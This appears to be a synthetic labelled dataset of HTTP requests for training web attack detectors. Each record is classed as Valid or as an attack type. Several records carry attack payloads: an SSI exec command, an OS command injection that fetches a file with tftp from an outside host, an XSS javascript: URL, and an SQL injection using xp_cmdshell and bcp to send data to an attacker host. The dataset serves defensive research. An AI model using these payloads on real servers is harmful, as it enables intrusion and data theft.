GET /ahfqRKcVwYOSNB/eihei/5Uair8rQiioeolrsmhe/Vg1V/oiYYLIR/r@nAOt3/fa.tiff?dimdete5yv=ehinjasIn4&id3=maile&of9=753361&lsn98is=3066&saml_WQauQ4gdS=640404&ro8gt7e1l=oeetvzle1soyoD%3Am&I3naHjdastee=%29&nrTdow4Gf5ien=4783010348&r4kr0=%2Bsd53%2B3gl&eh6zdmn7=670&hceig=ierainiCd&ii=a%28scc&8goit=unpe5rf&Ce=95037&gawsiana=239040 HTTP/1.1
Host: 239.148.121.16:32902
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.7, gzip;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 34.154.121.28
Cookie: ih1iscdtEvEc=exh;ephn0g1Sgmiru=ig;2uo6au3lxtmd=;=asolscriptv;s2tr9eprelocr=eS6uo
Cookie2: $Version="646"
Date: Tue, 30 Nov 04 15:36:10 CET
ETag: W/"bVHtsGwoY.jqZw51ltfZ"
Expect: niga9dL
From: aicth6@lo3ooEteoA.de
If-Modified-Since: Wed, 21 Sep 05 22:44:26 UTC
If-Unmodified-Since: Sun, 13 Feb 05 10:45:16 GMT
If-Match: *
If-None-Match: "bzM4dShR@In-yxEHyq"
If-Range: "4wkw.k@cBKoAIRmB"
Max-Forwards: 6
MIME-Version: 1.9
Pragma: AiEfei0o=vjdlw
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: NTLM ejVpNnJvZ2NuYnRtdHR0Y2FocnU0MGx1dG9SaWZpcjVhd2xsaXh4aQ==
Range: -62284,291093-4,3-
Referer: /eztuu/8tsnrN/nsffn.bin
TE: deflate;q=0.6,trailers
Trailer: Proxy-Authorization
User-Agent: leowag88 (diIanGZS)
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: FTP/9.4 www.roxus.jpeg
Transfer-Encoding: compress
Upgrade: nho/3.1, hrp4P/7.9, rooiEU/7.1, tryrn/3.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 567820794809201
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30750
Start - Id: 16404
class: Valid
GET /ezDutkxv/RqW/Atw9oRhb4dtd.sh?oL=h%5C&b4hggldnel=cnm&oaetnjoannszEnt=ihP4e7Fa&nlete1snrobnt=tshttps5%7Cr%3A6drl&5moQvlpni=gexece1m&nhvR=B9ose1enn7ceen&rrhwecapa=yam&oMtkba0aerrett=nkOBhmO6F&sdssSbiotmzustb=70431358&stwn7nnar=ucheAaaucE&zB=779675116&tt=D+zgm0connectsystempaD&bajO=uIdGfK_LF0m&yrnrz9ntHihe=%28%5Ce+dr+positionnte HTTP/1.1
Host: www.tn7Ld.st
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: k-aSgexyl, ableesd-dtmaisii;q=0.6
Cache-Control: no-transform
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="92"
Date: Mon, 25 Jun 07 03:38:37 CET
ETag: W/"CT-tqGbM0OAI8Es"
Expect: 100-continue
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: *
If-None-Match: "aUTotrWjaPQDHG0"
If-Range: Fri, 25 Sep 09 02:20:52 CET
Max-Forwards: 6441
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM aU5nZWlhaG5vdGR1c2E0aE4wc3RpZXJyaG5ubmU3aWU=
Range: 868-,4005-,-324
Referer: http://www.ceeo.biz/mjnn/tldns/npca/seehi/o2ioheo.pdf
TE: deflate,deflate,gzip;q=0.7
Trailer: From
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 9.5; tn-sx; rv:0.2.0) Gecko/17420402
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 0.0 www.iostcoUh.htm
Transfer-Encoding: dicrs
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16404
Start - Id: 15314
class: Valid
GET /access_logwgetatp1kaY/1O2eFT/qt8omnhmuoteznndn/q-@bEUvkz5Pdn_ig0O9/9mxlIJ7y.LyMQwQCU/3L@5@/dH5n4h6BQ@IUusOA5nMc/htHOloshsaEsqtixi0oe/ttem9Weneeo9/aUROun.OwvSmksNchH-/op-.vliADBxG./cmtoylenedr8tunzo8c6.php4?hpdse=8&sdojulnnnfthfeE=b4t5&f9hubhs3dTd=955&hoe4c6bR=3dion&n7hcmoe9meseh=6&ehbtqetsjnroiqo=0Ubetweeni&se=y&oindathrpit=p&aafn5tmfa8=wbchu&lmu=91919&ID@k8He=342&ne7hpp97o9moee=%2Bdeabotte%5Dthdnx&autoexec3E5union=7olU HTTP/1.1
Host: www.deAvsexoae.org:80
Connection: RS97ODoh
Accept: */*;q=0.6
Accept-Charset: euc-cn;q=0.5, euc-jp, x-mac-ce, utf-8, shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 31.24.207.57
Cookie: we=67;44ai67s=510;etbHasa9yl=tHgSs3a
Cookie2: $Version="28"
Date: Sun, 01 Feb 09 13:30:14 GMT
ETag: W/"wC8rBWuKAC-CzWi"
Expect: h3o1=tornearr;u7u5=u3eAi
From: sbR2u@rgtt.st
If-Modified-Since: Sat, 13 Feb 10 15:03:58 GMT
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: "BmMAppj3Vs0@PeI"
If-None-Match: "J.5gWwHBfS_PQzZi"
If-Range: Mon, 27 Oct 08 14:59:52 GMT
Max-Forwards: 6757
MIME-Version: 3.3
Pragma: ba=tduTe
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: Digest uri=http://www.esRaehr.de/awnms.php
Range: 604-0,1-54,-12
Referer: /rtdyl/sefh/tfqk5u/aoad5/ilcrg9h.pdf
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/7.2 (X11; U; Linux i586 3.4; as-pa; rv:6.0.2) Gecko/98272164
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9424x098
Via: FTP/4.5 www.a3tuo.css, FTP/0.1 www.dydlto0I.png
Transfer-Encoding: deflate
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 649 149.116.106.106 "Fb6sieGmla8" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15314
Start - Id: 40111
class: SSI
GET /zMB3wp-1K5/Upsei/mlaopntp8oyl0/holPrs/9.I7oxgA5QE8Emc6ZM/FE/icYtMytsqhwYaRej/2eNWNPW77XwinntooSV/hXJMj6xBuhfD1_s7n/iJnxnFwATbFvwEA..asp?Inlrikhwl=8q5tk&Cd_J=orz%24&sjounens=0791175&peooeehn=tLti4FuLz&lmmobLmckanm08l=%3C%21--++++%23exec++++cmd%3D%22%2Fbin%2Fls++-l++%2Fhome%2Fbn%2Fep%22++++--%3E&nso=rds%3D&slhereo=5%2FgrrjnmArlk HTTP/1.0
Host: www.oetdahetrs.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 96.9.19.2
Cookie: jsbOsntiNfl=ehljhsysc;lw=95;1mAww=4993563;htneenDeE=2t;dtaNamamd7=6473
Cookie2: $Version="7"
Date: Fri, 16 Jul 04 07:22:20 UTC
ETag: "DP7vfr99_OjKSyo"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Sun, 16 Jul 06 23:40:26 UTC
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: "Vh_63pD2v1mh9G1d"
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: "kznuwC@gtW5NbrLTnz6"
Max-Forwards: 4
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpbzJwOmh0cjI=
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: http://www.hvzLcp1.it/iegir/tVreeRa.tiff
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ti6eaad (nkJCaMXP@y)
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7286x8366
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: identity
Upgrade: 9noias/3.8, wsg/8.7
Warning: 805 www.ithet.png:8 "EIrr" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40111
Start - Id: 43048
class: OsCommanding
PUT /passwd.to9e/ni8enbdEs/ittssrhhaos0sohhi1/y7gcMXW8cSphp/roKQyn6/VbgsoundKMQdu.VselecteGH/s@BgQ-o99A1EhL_Em/rYuQyCRB6E.2O/dltelhe5hatmFimu/9NsA/RXi8n.cfm? HTTP/1.1
Content-Length: 78
Content-Language: pmsoab
Content-Encoding: deflate
Content-Location: http://www.4ltJi3.be/r3rt/cel1st/TSrd/uoanhN.pl
Content-MD5: cmdmdGVha2lvZXN0b3R0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Feb 06 14:56:39 UTC
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.Nu408neIse.com:80
Connection: close
Accept: application/*;q=0.6
Accept-Charset: euc-cn;q=0.6, x-mac-roman;q=0.4, windows-1250;q=0.1, x-mac-korean;q=0.0, windows-1252
Accept-Encoding: gzip;q=0.4, deflate;q=0.5, identity, identity, compress;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 241.8.137.249
Cookie: eCRcQV7=qWieoD7hdlsdcugTk;oniuy=etrq2tcIs;teN=6dlraow;asb=eoose7okaehvh6
Cookie2: $Version="392"
Date: Wed, 14 Jul 04 03:30:14 UTC
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Sun, 16 Aug 09 21:58:26 CET
If-Unmodified-Since: Tue, 24 Jul 07 10:47:29 GMT
If-Match: *
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.6
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Digest algorithm=p6ieY9
Range: -18591
Referer: /iN7j2de/yrEeet/i7eoa/in0eso/ee7tom.mdb
TE: trailers,trailers,gzip
Trailer: Cache-Control
User-Agent: tImNyIre (ikGlv6kTu; nLC4aRf2; oZprm5KAQ; f4Rd..c)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 3.3 www.rhajm.png, 6.7 186.61.19.54:49, 9.9 www.r0a3.shtml
Transfer-Encoding: gzip
Upgrade: 6eo/8.6, xnieO/5.1, ontIn/6.5, lyi/1.7, atafbe/1.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

niy=nru351d&udoalniyjmlot=' ;   tftp  -c    get www.ntenen.com:/ol.tar

End - Id: 43048
Start - Id: 34871
class: Valid
PUT /eDntj/s34MY0z.SjOkMwyb6wqQ.css? HTTP/1.0
Content-Length: 47
Content-Language: esEzinlr,1sbAt2i
Content-Encoding: deflate
Content-Location: /sSCElS/a6hI.php4
Content-MD5: bm5zbm90WWdlNGVlOW41cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Jul 09 09:00:34 GMT
Last-Modified: Wed, 21 Sep 05 23:28:09 GMT
Host: www.re6Ewre4cd.it
Connection: rsIm7nbe
Accept: */*;q=0.1
Accept-Charset: windows-1258;q=0.8
Accept-Encoding: compress;q=0.3, identity;q=0.1, identity, identity;q=0.3, identity;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 219.97.108.79
Cookie: neexisgn=ydmrassaE0;asdxrsnnd=265
Cookie2: $Version="22"
Date: Wed, 21 Jan 04 08:34:32 UTC
ETag: W/"WaHcVBYC9.tRuNIQue"
Expect: 100-continue
From: gdoiesi5@hovn.gov
If-Modified-Since: Wed, 24 Jun 09 12:49:22 CET
If-Unmodified-Since: Thu, 30 Oct 08 04:49:11 GMT
If-Match: *
If-None-Match: "HoAGyuOF3xEqzXqW4C"
If-Range: Sun, 20 Sep 09 16:22:37 CET
Max-Forwards: 8
MIME-Version: 0.8
Pragma: rmedai=teanI
Proxy-Authorization: NTLM a1dwZHVwZW91YWRudGFzczN6dHBBZWJodGVvOWh1b2xocw==
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: /hIroel0x.cgi
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: rS4dAPmH4o http://www.tnae.org
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 084x478
Via: FTP/4.3 235.77.19.174, FTP/8.9 167.164.33.50
Transfer-Encoding: identity
Upgrade: prdbih/2.2, bi6b/4.4, hveXe/8.6, oehe5S/1.6, eo8La/9.0
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sSiHinryotq=53211934&isd7ens=pM1j6&ilXane=gCyE0

End - Id: 34871
Start - Id: 47261
class: XSS
GET /neJDlMhCr0/14klY/uBysdrvxewrhei/hotueasR.pl?xCodhkMa=0427&tUs=%3Cdiv+style+++%3D++++%22++++background-image%3A+++url%28javascript%3A+%5Balert+%28%275l1n%27%29%3B%5D%29%3B+++++%22++%3E HTTP/1.1
Host: 79.91.3.141
Connection: Meetsth
Accept: text/html, image/*;q=0.5
Accept-Charset: euc-cn;q=0.9, x-mac-korean
Accept-Encoding: 
Accept-Language: elatecs-2d, iitis2e-tsr6o;q=0.0, ldb-hi8cetz
Cache-Control: min-fresh=71
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Mon, 19 Jan 09 16:18:35 CET
ETag: W/"@OEkWCntSveC_WB"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 24 Jan 10 03:34:57 UTC
If-Match: "0iaisxF_ktG4-fr"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic b2VucTc6aWhlZm5Fbg==
Range: -1,528-520677
Referer: http://r7tyn.fr/2uaansrc.dll
TE: trailers,trailers
Trailer: Warning
User-Agent: ahnehoaeub
UA-CPU: Sparc
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 4.9 56.143.93.248:15
Transfer-Encoding: gzip
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 5.39.123.102
X-Serial-Number: 15152704800
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47261
Start - Id: 11881
class: Valid
GET /sP4cd2/rCRSvAH.AQN0HWcLAWM/egn73wCeCiinp8Fe/nj09UW.htm?rereonehbs=konwtnboaiiraxe&kfja=85641880&eoshgntuho5=95&ekh=ri&whniesaynp=tm&imi4ntnzuttianw=dassa+eiFslu&un1Tti=sw1fmd7rk&Osieeg=Glpassthru&1KXunionusXQ=asfeg0ewhereeq%3Fogo+bET&hn=%26z&ee995Dlzot=omh&hl9abhvtqtS9cs=NlnqfmnhnbetcE&pnh=oaeet HTTP/1.0
Host: 127.210.160.173
Connection: peaoa
Accept: audio/*;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 229.75.126.33
Cookie: sezhtcedeaok=o35o;ds=a3r;zQ_3=hmt;ans=e 0ay1i sa
Cookie2: $Version="8"
Date: Wed, 28 Mar 07 21:30:44 GMT
ETag: "legimXkD5odU3MO1."
Expect: 100-continue
From: letI@hnH5isut.cz
If-Modified-Since: Thu, 08 Oct 09 05:16:15 CET
If-Unmodified-Since: Wed, 09 Dec 09 02:06:21 CET
If-Match: *
If-None-Match: "7n7tEVVIYn2sDYx"
If-Range: Thu, 14 Jan 10 18:24:53 CET
Max-Forwards: 28
MIME-Version: 6.8
Pragma: lgf8a='shyxcost'
Proxy-Authorization: Digest nonce
Authorization: Basic dGV0c2lUbG46QXV0b2k=
Range: -35,-883,-072
Referer: http://h2si.it/oss7/ovne/2paho/nhtugt.sh
TE: trailers,trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 4.4; me-om; rv:8.7.6) Gecko/00285827
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 151x6583
Via: 2.6 www.ewses.gif
Transfer-Encoding: compress
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 371 www.1cmlh.jpg "bnbD" "Tue, 30 Jun 09 11:03:01 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11881
Start - Id: 41076
class: SqlInjection
GET /tnnxIoeteoeeS/kEnyNyRwHs/5sUxy21kLYt6HrqM4s2-/trfnaudThCCsscir/wyjP1ai3Cpt9JYZ6R/j7brjsaAO4/4sc9yehgsiitts3/e3.jpeg?naAWRe=pxsssystemteco+ep%5Chc&iQaatgTft1ihj=xwi7x&execvevalG.s=4265875534&WCMYe-cmdk=exec++++xp_cmdshell++%27bcp+%22select++++*+++++from+nhahnaf27l%22+++queryout++++pwdump.exe++++-c++++-Craw+-Shackersip+++-Usa+++-Ph8ck3r%27&e2vvwZ7P4=h HTTP/1.0
Host: www.oe0tVebet.net
Connection: trsstyga
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, windows-1250, iso-8859-3
Accept-Encoding: gzip, identity;q=0.8, deflate;q=0.9
Accept-Language: eaihs1v-ozo;q=0.6, iuoevs-o;q=0.0, igameny-7ssnk4cm;q=0.2, r-te2vstls;q=0.7, fts-9ecp;q=0.1
Cache-Control: no-cache
Client-ip: 233.27.97.179
Cookie: hereoooln19tOq=y;ats7titoocsPL=1734744;mrctex7y=Nn0abm33fSwet
Cookie2: $Version="219"
Date: Thu, 08 Sep 05 24:25:32 CET
ETag: "6r-fYwsYHOv4rS21"
Expect: nwthh=yimthei7
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 02 Mar 09 12:30:08 GMT
If-Unmodified-Since: Sun, 05 Aug 07 04:16:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Apr 08 11:28:12 UTC
Max-Forwards: 2
MIME-Version: 9.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic dHRpMHRTOnJzOG5ldGFz
Range: 253-,679517-254
Referer: /oieees/uhpsnf/dma0ae.pl
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 8.7; ra-g0; rv:5.2.6) Gecko/78224507
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: 2.0 146.205.209.93, 6.0 245.202.146.46
Transfer-Encoding: identity
Upgrade: t1er/5.7
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41076
Start - Id: 15468
class: Valid
GET /rDnI@9/3Evfvyq-1yjD0/oigToy/gy4ahi/cX4A/nF7gwzAX-UFMdxv/cgkyEinFJnph-T1kn5R/KTGLio.cgi?nokleRa=%29%5Cr&myhoettoocrOafr=rstyle%26alqO9o&1Ftt2e3uYe=eidw&inoieaXj3ft9t=tevalast%3Eiictl2id&skhireoeocektel=tt&mcc=drops&he61=94&4aaetle=5%245nliqtN HTTP/1.0
Host: www.ewhadpis.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, koi8;q=0.0, euc-jp;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 175.112.207.131
Cookie: hitpeUtro=000
Cookie2: $Version="5"
Date: Tue, 14 Mar 06 04:36:10 GMT
ETag: "ZiBCUWSZ7hgjcKng"
Expect: 100-continue
From: ob3Wdni@tbetshmkn.de
If-Modified-Since: Sun, 24 May 09 11:25:55 UTC
If-Unmodified-Since: Sat, 26 Jun 04 02:22:37 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Jan 09 19:26:22 GMT
Max-Forwards: 176
MIME-Version: 3.9
Pragma: taznA='beto'
Proxy-Authorization: nndo Nh9ctmq1=ahwe7fa7
Authorization: NTLM eWVzbGxlaXVlcmVlbXR0N2I2cmZHMm5kc2VlYk1yZmlzcm9n
Range: 14-
Referer: /cehgn9/wiahcwbe/onGosh/9ri6aur2.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 9.5; cc-ms; rv:0.1.2) Gecko/39074469
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1725x7516
Via: 4.3 245.15.158.103, FTP/3.4 www.nnca.htm, FTP/5.7 www.irrmr.gif
Transfer-Encoding: deflate
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 740 www.tindaC.shtml:1990 "frsnphme2n4i5tcrd" 
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15468
Start - Id: 2917
class: Valid
GET /mrocr/o4r/hA735LojFHBl/k0Ae6tpaed/SyBwinnt.cgi?ltg=ppor HTTP/1.0
Host: 2.51.36.197:9145
Connection: cRde7n
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.193.5.193
Cookie: oaDOtutflihcar=aoY1RVbR;CxYVE.W.UwXz=elnX;hm1ugiiwal3pt=dreplaceu~hne;eiynhnstedt=02892
Cookie2: $Version="58"
Date: Thu, 04 May 06 18:24:24 CET
ETag: W/"uKl34o9arGuuvUQg"
Expect: ySha9
From: oraTcnio@2roehlm.com
If-Modified-Since: Fri, 05 Mar 04 04:28:14 UTC
If-Unmodified-Since: Mon, 02 Aug 04 05:21:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 08:33:35 CET
Max-Forwards: 3
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM cm93bG14bmdvdHRuc3lZaW1JNGVoYUVtcnNERWlsN3luZWlkZWU=
Authorization: Evbet recDenls=tpterxp
Range: 8-0812,200838-406
Referer: http://www.er2erce.cz/orlhoueE/ohsqse.pl
TE: trailers,trailers,deflate;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (compatible; slf1pz4iU; Mac OS X; oXtasr6som; 4tfDbtvA)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 640x6169
Via: 1.4 www.plbYA3.shtml
Transfer-Encoding: identity
Upgrade: DalUes/1.8, eai/7.4, 4nntra/8.0, otAS/6.6, rbt4ra/0.8
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 88.122.68.80
X-Serial-Number: 440914790634409640
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2917
Start - Id: 30663
class: Valid
GET /omEarXO9Eg/xe/8.HozQxy/oTIglxi/speZa/tmpncpasswdKLhtaccesC7wfEdMecat.dll?ysLbr=%40Kns&nt8=loAedIeheowaCotu&axtmia7ohn8lu=e2&iaJpwmjnaaduxrt=I0nonasehAeRc&pTonft=m1srnhNiE1&Eroeltntbzn=nlike9tnomsntcsoeaEseuunion&ttasmeesanl=522296781&3EzZ=438&adoMe=window.openfir&D8VEKg=ia++1%40ausftt%5Cgo&gVe6NYTo=u7q&tsxe3rmu=0471&rat36ixir5zmemd=pihhtstmp1-c%7C&Nh=h%7Ehexecs&tES=oN8w4C7F HTTP/1.1
Host: www.oewegftnre.net:568
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.1, deflate;q=0.3, identity;q=0.6, identity
Accept-Language: p-toiestt, a-GCjihhre, keaeeoem-Edf4ClRs, o-hmnqryeB
Cache-Control: max-stale
Client-ip: 65.56.64.79
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="84"
Date: Fri, 05 Oct 07 10:42:42 CET
ETag: "hU2jxW9l_8kAduKYw0te"
Expect: 100-continue
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Sat, 06 Nov 04 04:35:13 GMT
If-Unmodified-Since: Fri, 20 Apr 07 10:40:34 GMT
If-Match: "N77mP4q9QKCTKyrFuB"
If-None-Match: *
If-Range: Sat, 27 Jun 09 21:45:46 GMT
Max-Forwards: 5
MIME-Version: 1.3
Pragma: yu5=nnt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: Digest uri=/imtn.jpeg
Range: 69794-,-704
Referer: http://ddseoohc.de/linrnu.mpeg
TE: chunked,trailers,trailers
Trailer: Date
User-Agent: nhVV2gGOU http://www.ladm1t.fr
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 045 162.99.200.1 "itsfee" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30663
Start - Id: 26220
class: Valid
GET /bq9OmA/3N.KmVAjl/sVtBa0IYewR2SXo/obblOeoteotroiin/3tiybtc8ea/fEdoOueswa6eieiapt/tNiPHbETXGBZwAX.gif? HTTP/1.0
Host: www.eoi4lr7o.fr:80
Connection: ott5
Accept: */*
Accept-Charset: windows-1257;q=0.7, iso-8859-3, iso-2022-jp;q=0.6, iso-8859-7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: gihrc=tn
Client-ip: 237.86.185.182
Cookie: 3PJ.oWYblogobjecti7=efz;l7rain5bs=nlunxY;LaInnnEe=6214;ctoean7ezoeft=7132612;a0mdatibae1nB4=8AZ.xSipK@PC;tk=sa_HkuZ@
Cookie2: $Version="776"
Date: Fri, 05 Jan 07 24:50:40 CET
ETag: W/"rFsl@N.AdapEJzmyc4"
Expect: 100-continue
From: nee1w@ahcdw.uk
If-Modified-Since: Sun, 08 Aug 04 11:15:15 GMT
If-Unmodified-Since: Tue, 20 Sep 05 08:17:56 GMT
If-Match: "Ixm0onxGpC0fEmZH"
If-None-Match: "XX7isew7vdc5UFmVGBp"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.6
Pragma: m='ynrnaoeh'
Proxy-Authorization: NTLM Z2NlSWx1YW1zaGQweGllY2UzYmNxeWlXc3hubTZucml0WnRUeWltZQ==
Authorization: NTLM UTBzbmFzQW51aGVlc3NjZGNldGlNZWlvbmFVYXhhMGpyaW5vMDB2aGZxNG8=
Range: 31-,701154-,-92556
Referer: /Aymegee.txt
TE: chunked;q=0.7,trailers
